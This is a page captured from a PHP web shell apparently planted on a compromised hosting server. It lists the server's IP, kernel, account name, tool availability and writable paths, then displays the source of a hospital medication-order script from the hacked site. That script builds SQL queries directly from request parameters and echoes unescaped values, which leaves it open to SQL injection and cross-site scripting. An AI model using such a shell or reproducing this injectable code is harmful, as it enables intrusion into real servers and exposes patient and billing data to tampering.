Mr.Fn4ticHz Shell
Server IP : 162.240.98.243  /  Your IP : 3.144.40.161
Web Server : Apache
System : Linux server.bti.yaw.mybluehostin.me 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : btiyawmy ( 1003)
PHP Version : 7.2.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/btiyawmy/public_html/login.easenup.in/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ HOME ]     

Current File : /home/btiyawmy/public_html/login.easenup.in/Medication_order_timline.php
<!DOCTYPE html>
<html>  <head>
    
  
  </head>
  <body>
    <title>In House Patient</title>
 
  <body>
      
           	<h3><i class="fa fa-angle-right"></i> Medication Order</h3>
          	<style>
    form{
        margin: 20px 0;
    }
    form input, button{
        padding: 5px;
    }
    table{
        width: 100%;
        margin-bottom: 20px;
		border-collapse: collapse;
    }
    table, th, td{
        border: 1px solid #cdcdcd;
    }
    table th, table td{
        padding: 10px;
        text-align: left;
    }
	<style>
           
			table{
    border: solid 1px gray;
    width: 100%;
  }
  
  
  </style>
  </head>
  <?php
include("dbconnection.php");
require_once('../DBManager.php');
require_once('../patientmanager.php');



if(isset($_POST['CreateReturn'])) 
{ 
$sql ="UPDATE `medicine_inventory` SET `totalQuatity`='$_POST[AddQty]' WHERE inventory_id='$_GET[inventory_id]'";
if($qsql = mysqli_query($con,$sql))
		{
    echo "<script>alert('Successfully');</script>";
    echo "<script>window.open('Medication_order.php?prescriptionid=$_GET[prescriptionid]&patientid=$_GET[patientid]'); </script>";
  } else {
    echo "Sorry, there was an error uploading your file.";
  } 
    
}



?>
<input type="search" class="light-table-filter" data-table="order-table" placeholder="Search">
    <div id="container">
      
 <table border="1" class="order-table">
      <tbody>
                  <tr>
          <th>Date – time </th>
          <th>Medication Details</th>
            
          <th colspan='2'>Action</th>
         </tr>
        </tbody>
<?php
include("dbconnection.php");
require_once('../DBManager.php');
require_once('../LoginManager.php');
$narayan=LoginManager::currentUser();
$usertype=LoginManager::getUserTypeByuname("$narayan");



$slot ="SELECT * FROM `medicine_slot` where prescriptionid='$_GET[prescriptionid]' AND patientid='$_GET[patientid]'";
$qslot = mysqli_query($con,$slot);
while($rslot = mysqli_fetch_array($qslot)){

$mi="SELECT * FROM `medicine_charge` WHERE srno2='$rslot[srno]' AND status='1'";
$resultmi = $con->query($mi);
while($rowMI = mysqli_fetch_array($resultmi)){


$sql1 ="SELECT * FROM site_users WHERE userno='$rslot[admin_id]'";
		$qsql1 = mysqli_query($con,$sql1);
		$re = mysqli_fetch_array($qsql1);
		
	
		
echo "<tr>
<td><b>Created at:</b> $rowMI[created_at]
                 <br><b>Created By:</b> $re[name] </td>";
 echo" <td><b>Name :</b> $rowMI[MedicineName]";
                
                 
	   
switch ($re1[durationselect]) {
  case '1':
    echo "Days";
    break;
      case '7':
    echo "Week";
    break;
case '28':
    echo "Month";
    break;

        default:
    
}


 echo " <br>	<b>	Batch No :</b> $rowMI[batchNumber]";
// echo " <br>	<b>	Quantity Sold :</b> $rowMI[Quantity] <br>	";
 //echo " <b>Grand Total</b>  :<i class='fa fa-inr'></i> $rowMI[FinalAmt]";
 
 echo " <br>	<b>	Quantity Sold :</b> $rslot[upgradeQty] <br>	";
 echo " <b>Paid Amount</b>  :<i class='fa fa-inr'></i> $rslot[pricetotal]";
 
 
echo "<td>";
if($rowMI['status']=='1'){
	    echo "<a href='add_medicine_qty.php?inventory_id=$rowMI[inventory_id]&prescriptionid=$_GET[prescriptionid]&patientid=$_GET[patientid]&medicine_id=$rowMI[medicine_id]&Batch_number=$rowMI[batchNumber]&srno2=$rslot[srno]&mcid=$rowMI[id]' ><img src='uploads/loader/returns2.png' alt='return' style='width:70px; height:50px;'></a><br><br>";
	}else{
	    echo "<p>Payment Due</p><br>";
	}
echo "</td>
</tr>";

}}		?>
</table>






            <script>
      let modalBtns = [...document.querySelectorAll(".button")];
      modalBtns.forEach(function(btn) {
        btn.onclick = function() {
          let modal = btn.getAttribute('data-modal');
          document.getElementById(modal)
            .style.display = "block";
        }
      });
      let closeBtns = [...document.querySelectorAll(".close")];
      closeBtns.forEach(function(btn) {
        btn.onclick = function() {
          let modal = btn.closest('.modal');
          modal.style.display = "none";
        }
      });
      window.onclick = function(event) {
        if(event.target.className === "modal") {
          event.target.style.display = "none";
        }
      }
    </script>
    <script>
 function drugload(drid)
{
	    if (window.XMLHttpRequest) {
            // code for IE7+, Firefox, Chrome, Opera, Safari
            xmlhttp = new XMLHttpRequest();
        } else {
            // code for IE6, IE5
            xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
        }
        xmlhttp.onreadystatechange = function() {
            if (this.readyState == 4 && this.status == 200) {
                document.getElementById("divdr").innerHTML = this.responseText;
            }
        };
        xmlhttp.open("GET","loaddrug.php?drid="+drid,true);
        xmlhttp.send();
}
            
  
</script>

  </body>
</html>
</div>

Anon7 - 2022
AnonSec Team